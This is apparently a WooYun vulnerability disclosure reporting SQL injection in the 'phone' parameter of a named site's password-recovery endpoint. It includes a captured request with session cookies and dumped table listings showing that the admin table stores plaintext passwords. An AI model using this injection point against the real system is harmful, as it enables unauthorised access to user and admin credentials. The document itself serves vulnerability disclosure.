WooYun.org

站点：
http://51.eset.com.cn/ 渠道销售积分系统
phone参数没有过滤，导致注射
burp抓取数据包
POST /index.php/user/lookpwd HTTP/1.1
Content-Length: 162
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://51.eset.com.cn/
Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22d57d0d9782a1adaa9a207c55dc14b92a%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%22112.80.230.66%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F53%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221389921049%22%3B%7D880687b93f5defac935eb2eb3f7969fe; PHPSESSID=005e5efc592d8bd666082b4766aded0a
Host: 51.eset.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
phone=123&pwdanswer=1&pwdques=1

Database: 51_v2
[26 tables]
+------------------+
| None |
| admin |
| allow_virtual |
| category |
| config |
| game1 |
| integral_details |
| orderinfo |
| orders |
| phone_tmp |
| prize |
| product_attr |
| product_old |
| province |
| recordhistory |
| sellhistory |
| sellhistory_old |
| stock |
| stock_tmp |
| sysannouncement |
| trackcode_tmp |
| userinfo |
| users |
| users_222 |
| users_old |
| weekreport |
+------------------+
Database: 51_v2
+------------------+---------+
| Table | Entries |
+------------------+---------+
| trackcode_tmp | 22142 |
| sellhistory_old | 9893 |
| recordhistory | 7374 |
| integral_details | 5928 |
| stock | 5488 |
| users_old | 3461 |
| users_222 | 819 |
| sellhistory | 607 |
| weekreport | 385 |
| phone_tmp | 343 |
| users | 235 |
| product_attr | 200 |
| allow_virtual | 63 |
| product_old | 52 |
| game1 | 49 |
| province | 34 |
| userinfo | 32 |
| orders | 12 |
| category | 5 |
| admin | 3 |
| config | 1 |
| prize | 1 |
| sysannouncement | 1 |
+------------------+---------+
admin表密码明文存储

USERS表的字段，不多说

over